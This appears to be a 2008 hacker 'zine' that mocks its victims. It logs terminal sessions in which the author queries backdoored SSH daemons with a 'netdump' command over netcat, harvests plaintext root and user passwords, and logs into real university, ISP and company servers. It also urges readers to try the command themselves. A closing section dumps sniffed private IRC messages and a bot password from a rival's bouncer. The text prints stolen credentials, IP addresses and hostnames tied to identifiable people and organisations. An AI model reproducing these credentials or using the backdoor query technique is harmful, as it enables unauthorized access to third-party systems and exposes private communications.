central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12
root@207.145.66.12's password: 

Last login: Wed Aug  6 23:25:38 2008 from 189.4.184.201              --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ?
                                                                     --------->>>>>>>>>>>>>>>>>>>>>>>>> doesn't that make you sad? i mean, wtf...

d4:~#
d4:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux d4 2.6.25-2-686 #1 SMP Tue May 27 15:38:35 UTC 2008 i686 GNU/Linux
 03:36:51 up 68 days,  4:58,  0 user,  load average: 1.88, 1.80, 1.74
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:207.145.66.12  Bcast:207.145.66.255  Mask:255.255.255.0
          inet6 addr: fe80::209:6bff:fe8c:e58/64 Scope:Link

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 212.111.196.163 22
Trying 212.111.196.163...
Connected to 212.111.196.163.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> i DEMAND THE PASSWORD !
SSH2_OUT: 127.0.0.1     user: root      pass: x4rtuhg6  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, i missed you, localhost.
pass_from: ::ffff:10.66.10.111  user: root      pass: dihlordifenil  --------->>>>>>>>>>>>>>>>>>>>>>>>> h3h3 >;(

central@labsec [~xoxox/h3h3] # ssh root@212.111.196.163
root@212.111.196.163's password: 

Last login: Fri Aug  8 19:49:52 2008 from 189.4.161.222              ------------>>>>>>>>>>>>>> lets laugh for a while now

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux users 2.6.23-gentoo i686 ****

root@users:~#
root@users:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
 10:49:08 up 171 days, 22:37,  1 user,  load average: 0.20, 0.24, 0.21
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0     10:46    0.00s  0.44s  0.00s w
          inet addr:192.168.253.3  Bcast:192.168.253.255  Mask:255.255.255.0
          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
          inet addr:169.254.78.132  Bcast:169.254.255.255  Mask:255.255.0.0
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          inet addr:212.111.196.163  Bcast:212.111.196.191  Mask:255.255.255.224
          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
          inet addr:212.26.143.6  Bcast:212.26.143.7  Mask:255.255.255.252
          inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 212.143.216.226 22
Trying 212.143.216.226...
Connected to 212.143.216.226.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting tired of this.
pam_from: 62.219.238.196        user: root      pass: QWERFcxz  (mail2.tikalnetworks.com) ----->>>>>>>> no kidding.

central@labsec [~xoxox/h3h3] # ssh root@212.143.216.226
root@212.143.216.226's password: 

jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet
Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel GNU/Linux
 09:58:11 up 3 days, 18:03,  1 user,  load average: 1.29, 1.16, 1.08
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0     09:34   16:19   0.32s  0.30s ssh 10.0.0.3
          inet addr:10.0.0.253  Bcast:10.0.0.255  Mask:255.255.255.0
          inet addr:127.0.0.1  Mask:255.0.0.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep OUT

central@labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep from|grep -v bullshit



central@labsec [~xoxox/h3h3] # ssh root@143.107.133.103 'uname -a'
root@143.107.133.103's password: 

Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.144.186.37 22
Trying 200.144.186.37...
Connected to shark.lcca.usp.br (200.144.186.37).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now on, no more netdump messages
SSH2_OUT: 127.0.0.1     user: root      pass: UspNNNNd  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> just got tired, u knoW
SSH2_OUT: 127.0.0.1     user: amazonas  pass: UspNNNNd  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im almost stopping pasting stuff

-> alot of kool shit regarding usp.br here
try yourself-> echo netdump|nc 200.144.186.37 22|grep usp.br
or just grep OUT

kthxnpurwelcome

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep localhost
SSH2_OUT: 127.0.0.1     user: root      pass: ArmY1*00  (localhost)        ->>>>>>>>>>>>>>>>> im glad you are here :) kind of makes it easy

central@labsec [~xoxox/h3h3] # ssh root@200.145.203.74
root@200.145.203.74's password: 

Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux hobbes 2.6.18-6-686 i686 ****

root@hobbes:~#
root@hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
 05:47:44 up 27 days, 15:12,  1 user,  load average: 0.21, 0.15, 0.06
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
rico     :0       -                06Aug08 ?xdm?   5:39   0.71s x-session-manager
          inet addr:200.145.203.74  Bcast:200.145.203.255  Mask:255.255.255.0
          inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
root@hobbes:~# 

central@labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep unesp        
pass_from: 200.145.203.42       user: rico      pass: so31fia12         (nemo.df.ibilce.unesp.br)
SSH2_OUT: 200.145.203.42        user: ronaldo   pass: LANmu80   (nemo.df.ibilce.unesp.br)

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 67.15.56.12 22
Trying 67.15.56.12...
Connected to 67.15.56.12.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9
netdump
SSH2_OUT: 127.0.0.1     user: root      pass: l3nny1nt3l        (localhost)
SSH2_OUT: 127.0.0.1     user: lenny     pass: l3nny1nt3l        (localhost)
pass_from: 76.188.180.141       user: joe       pass: 1207j0s3ph7ys0n9813       (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141       user: devel     pass: ha1W0;rlD.0121    (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141       user: celtrust  pass: 1207j0s3ph9813    (cpe-76-188-180-141.neo.res.rr.com)



central@labsec [~xoxox/h3h3] # ssh root@67.15.56.12
root@67.15.56.12's password: 

Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 ****

[root@f1 ~]#
[root@f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
 05:20:15 up 153 days,  9:30,  0 users,  load average: 2.62, 1.27, 0.63
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:67.15.56.12  Bcast:67.15.57.255  Mask:255.255.254.0
          inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
          inet addr:67.15.57.240  Bcast:67.15.57.255  Mask:255.255.255.0
          inet addr:67.15.57.241  Bcast:67.15.57.255  Mask:255.255.255.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@66.119.174.19
root@66.119.174.19's password: 



                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 ****

root@res1:~# 
root@res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
 12:54:34 up 315 days, 17:40,  4 users,  load average: 0.58, 0.35, 0.27
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
sky      pts/0    66.119.176.2     11:41    1:12   0.00s  0.00s -bash
sky      pts/3    66.119.176.2     Tue15   20:53   0.18s  0.00s sshd: sky [priv] 
sky      pts/6    66.119.176.2     11:42    1:10   0.16s  0.01s sshd: sky [priv] 
vee      pts/7    74.221.143.3     12:23   28:41m  0.07s  0.00s telnet seton-3550
          inet addr:66.119.174.4  Bcast:66.119.174.15  Mask:255.255.255.240
          inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
          inet addr:66.119.174.29  Bcast:66.119.174.31  Mask:255.255.255.240
          inet addr:65.39.152.235  Bcast:65.39.152.255  Mask:255.255.255.224
          inet addr:65.39.152.237  Bcast:65.39.152.255  Mask:255.255.255.224
          inet addr:66.119.174.19  Bcast:66.119.174.31  Mask:255.255.255.240
          inet addr:65.39.152.239  Bcast:65.39.152.255  Mask:255.255.255.224
          inet addr:66.119.174.3  Bcast:66.119.174.15  Mask:255.255.255.240
          inet addr:66.119.174.2  Bcast:66.119.174.15  Mask:255.255.255.240

pass_from: 66.119.176.2         user: simon     pass: pass77    (mail.metrobridge.com)        [whole metrobridge with the same pass]
pass_from: 66.119.176.2         user: sky       pass: rotoFro7  (mail.metrobridge.com)        [whole metrobridge with the same pass]

have fun

- what a shame.. again, metrobridge ? i told you to keep an eye on your sshd since your zine :(


-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@200.239.200.102
root@200.239.200.102's password: 

Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
Linux 2.6.11.12-ul1.

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux proxy2-rj 2.6.11.12-ul1 i686 ****

root@proxy2-rj:~# 
root@proxy2-rj:~# uname -a;hostname -f;w
Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown
proxy2-rj.pop-rio.com.br
 17:14:22 up 97 days,  5:09,  0 users,  load average: 2.16, 1.88, 1.76
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root@proxy2-rj:~# 
root@proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq
pass_from: 200.239.245.50       user: root      pass: Beth01@   (gwpr03.microlink.com.br)
pass_from: 200.239.245.70       user: root      pass: pa$$w0rd  (Froes.microlink.com.br)
root@proxy2-rj:~# ./sshread mac.h|grep OUT
SSH2_OUT: 127.0.0.1     user: root      pass: BuCaaAadd         (localhost) -----> /me laughs

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # ssh root@143.107.250.214
root@143.107.250.214's password:

Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br

                          ..... !! HELLO WORLD !! .....              

                            @@@@@@              @@@@@@               
                           @@    @@            @@    @@              
                 @@    @@  @@   @@@  @@    @@  @@   @@@  @@    @@    
                  @@  @@   @@  @ @@   @@  @@   @@  @ @@   @@  @@     
                   IIII    II I  II    IIII    II I  II    IIII      
                   IIII    III   II    IIII    III   II    IIII      
                  II  II   II    II   II  II   II    II   II  II     
                 II    II   IIIIII   II    II   IIIIII   II    II    
                 **** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 ****          ->>>> new kool motd, n1cE rIpZ

[root@noelrosa ~]#

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
-;;;;;;; i think thats enough to paste, right ?
-;;;;;;  anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got from them

-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/ 

r47 is r47@bl4ckh47.org * i own u!            [and We own you!]
r47 on @#combat #osiris @#/<-rad 
r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server
r47 actually using host 2001:470:1f15:42b::3
r47 End of /WHOIS list.

central@labsec [~xoxox/h3h3] # ssh root@bl4ckh47.org -p 2222 bash

root@bl4ckh47.org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz)
uname -a;w;hostname -f
Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux
 10:13:26 up 162 days,  8:25,  0 users,  load average: 0.04, 0.05, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
VoIP.eurosignal.cz

sit0      Link encap:IPv6-in-IPv4  
          inet6 addr: ::10.0.2.254/96 Scope:Compat
          inet6 addr: ::127.0.0.1/96 Scope:Unknown
          inet6 addr: ::10.0.2.4/96 Scope:Compat
          inet6 addr: ::77.78.84.242/96 Scope:Compat
          UP RUNNING NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

sit1      Link encap:IPv6-in-IPv4  
          inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
          inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
          inet6 addr: fe80::a00:2fe/64 Scope:Link
          inet6 addr: fe80::a00:204/64 Scope:Link
          inet6 addr: fe80::4d4e:54f2/64 Scope:Link
          UP POINTOPOINT RUNNING NOARP  MTU:1480  Metric:1
          RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1677861 (1.6 MiB)  TX bytes:982003 (958.9 KiB)

tcp        0      0 77.48.84.242:65535      189.4.189.139:61593     ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667  ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED
tcp6       0      0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED

perl      12655     root    4u  IPv4  3027913       TCP *:65535 (LISTEN)
root     12655  0.0  0.3   5256  3220 ?        S    Mar19   2:39 supervise log
- nice process name btw
- lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks - 

<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :u know d0n
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he took my nick
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :he's packeting me
<- :d0n_!burnout@burnout.bitchx.org PRIVMSG r47 :;\
-> PRIVMSG d0n_ :d0n No such nick/channel
-> PRIVMSG d0n_ :d0n End of /WHOIS list.
-> PRIVMSG d0n_ :change
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :lamer :(
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :owns my dsl
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :real leet
-> PRIVMSG d0n :who ?
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :that d0n guy
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :had my nick
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :was talking shit
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :"here comes the ddos" he said
-> PRIVMSG d0n :fuck
-> PRIVMSG d0n :lets hack him
-> PRIVMSG d0n :not hard target
-> PRIVMSG d0n :hehehe
-> PRIVMSG d0n :to me
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HHEHEHEEH\
-> PRIVMSG d0n ::>:>:>:>
-> PRIVMSG d0n :sup bitchx
-> PRIVMSG d0n ::>
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 ::)
-> PRIVMSG d0n :bitchx bugged
-> PRIVMSG d0n :do u use it ?
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :the client?
-> PRIVMSG d0n :yah
-> PRIVMSG d0n :0dayz
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :no shit..
-> PRIVMSG d0n :eheh

*********************** run to the hillz he h4s b1tchx 0d4y **********************

-> PRIVMSG d0n :i have windows on linux (vmware)                              ->>>>>>>>>>>>>>>>>>>>> lies
-> PRIVMSG d0n :hjmm
-> PRIVMSG d0n :;>
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :ah yeah
-> PRIVMSG d0n :omfg
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :any more fun with efnet soon?
-> PRIVMSG d0n :im still drunked
-> PRIVMSG d0n :no more
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :HEHE
-> PRIVMSG d0n :im stoped with x0x0x
<- :d0n!burnout@burnout.bitchx.org PRIVMSG r47 :;p
-> PRIVMSG d0n :just sniffing idiots now                                      ->>>>>>>>>>>>>>>>>>>> so we are

*********************** /laugh time ********************************************                               
-> PRIVMSG accuser :nem
-> PRIVMSG accuser :nao me comunico mais com povo br                          ->>>>>>>>>>>>>>>>>>>>
-> PRIVMSG accuser :nao eh meu nivel
-> PRIVMSG accuser :so alguns amigos
-> PRIVMSG accuser :nego roubo meu canal ontem                                ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby
-> PRIVMSG accuser :recuperei
-> PRIVMSG accuser :e tomei o nick deles                                      ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks
-> PRIVMSG accuser :/w psys                      
-> PRIVMSG accuser :/w dtr
-> PRIVMSG accuser :hehehe                                                    ->>>>>>>>>>>>>>>>>>>> now i feel gr8
<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :eu vi
<- :accuser!~psy@64.244.62.214 PRIVMSG r47 :o psys tacando monte de bot
-> PRIVMSG accuser :comigo eh dificil um br poder                             ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
-> PRIVMSG accuser :hehehe
-> PRIVMSG accuser :eu mando!                                                 ->>>>>>>>>>>>>>>>>>>> im THE guy!
-> PRIVMSG accuser :eu to mo fora de guerra cara
-> PRIVMSG accuser :mas parece q os caras me perseguem
-> PRIVMSG accuser :e sismam q sou lamer                                      ->>>>>>>>>>>>>>>>>>>> /me laughs
-> PRIVMSG accuser :rs

-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47                                ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing
-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax  ->>>>>>>>>>>>>>>>>>>> 3h3h3h3

<- :KoaL4!h@216.75.56.186 PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
-> PRIVMSG KoaL4 :cara
-> PRIVMSG KoaL4 :vou
-> PRIVMSG KoaL4 :mas nao me atrapalha
-> PRIVMSG KoaL4 :to aki programando
-> PRIVMSG KoaL4 :pra um cliente chato pra kct

<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :ta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :arrumando truta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com os cara da defland pq
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :falaram meu nome em vao
-> PRIVMSG \g4br13l\ :nao qro isso
-> PRIVMSG \g4br13l\ :so isso
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :r47
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :tu se esquenta
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :com bobagem
-> PRIVMSG \g4br13l\ :hehee
<- :\g4br13l\!~ucvn@server3.erz.univie.ac.at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :nao qro pivete
-> PRIVMSG \g4br13l\ :de merda
-> PRIVMSG \g4br13l\ :kiddie
-> PRIVMSG \g4br13l\ :falando de mim
-> PRIVMSG \g4br13l\ :pq qm manda                                       ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ :sou eu                                            ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :esse univie.ac.at eh show
-> PRIVMSG \g4br13l\ :tenho a www la
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :usam checkpoint firewall one                      ----->>>>>>>>>>>>> what the fuck ?
-> PRIVMSG \g4br13l\ :tunnelling by trace                               ----->>>>>>>>>>>>> ?!?1
-> PRIVMSG \g4br13l\ :mto dificil pacota-la


*********************** boyfriends are fighting - portuguese only, sorry **********************
-> PRIVMSG #thc :skotch is gay
-> PRIVMSG skotch :eai vagabunda
-> PRIVMSG skotch :vai fica na putaria ateh qdo
-> PRIVMSG skotch :to cheio de novidades
-> PRIVMSG skotch :e para de me chamar de verme
-> PRIVMSG skotch :rs
<- ::skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo
-> PRIVMSG skotch :ahahaha
-> PRIVMSG skotch :vc tem certeza                                     ->>>>>>>>> are you sure baby ?
-> PRIVMSG skotch :entao eh  isso ?
-> PRIVMSG skotch :ja era ?:
-> PRIVMSG skotch :ja era ?
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :sim
-> PRIVMSG skotch :eu nao vou voltar aki denovo
-> PRIVMSG skotch :pra falar com vc
-> PRIVMSG skotch :ja era ?
-> PRIVMSG skotch :CERTEZA?                                             ->>>>>>>> are you sure we are breaking apart?????
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo
-> PRIVMSG skotch :to na minha tb
-> PRIVMSG skotch :so acho
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vc fala merda e dps quer voltar a tras
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :coisa de mlk
-> PRIVMSG skotch :filho
-> PRIVMSG skotch :eu so acho
-> PRIVMSG skotch :q eh besteira
-> PRIVMSG skotch :agente brigasr por isso
-> PRIVMSG skotch :so isso
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :mermao n eh a primeira vez
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tu da dessas
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :vem falando bosta
:skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e dps vem se desculpando
-> PRIVMSG skotch :so joguei um verde
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n so esses verme de merda
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q paga pau pra vc
-> PRIVMSG skotch :nao vou fazer isso denovo
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q aceita tudo q vc fala
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :nao falei q tu paga sapo pra mim
-> PRIVMSG skotch :tu tb
-> PRIVMSG skotch :eh cheio das noia q nem eu
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :tu soh mostro q n confia
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :axando q eu passo maq pra xscholler
<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :aff
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu some
-> PRIVMSG skotch :so joguei um verde
-> PRIVMSG skotch :se nao confiasse
-> PRIVMSG skotch :tu nao tinha
-> PRIVMSG skotch :tds minhas box
-> PRIVMSG skotch :TODAS
-> PRIVMSG skotch :fdp
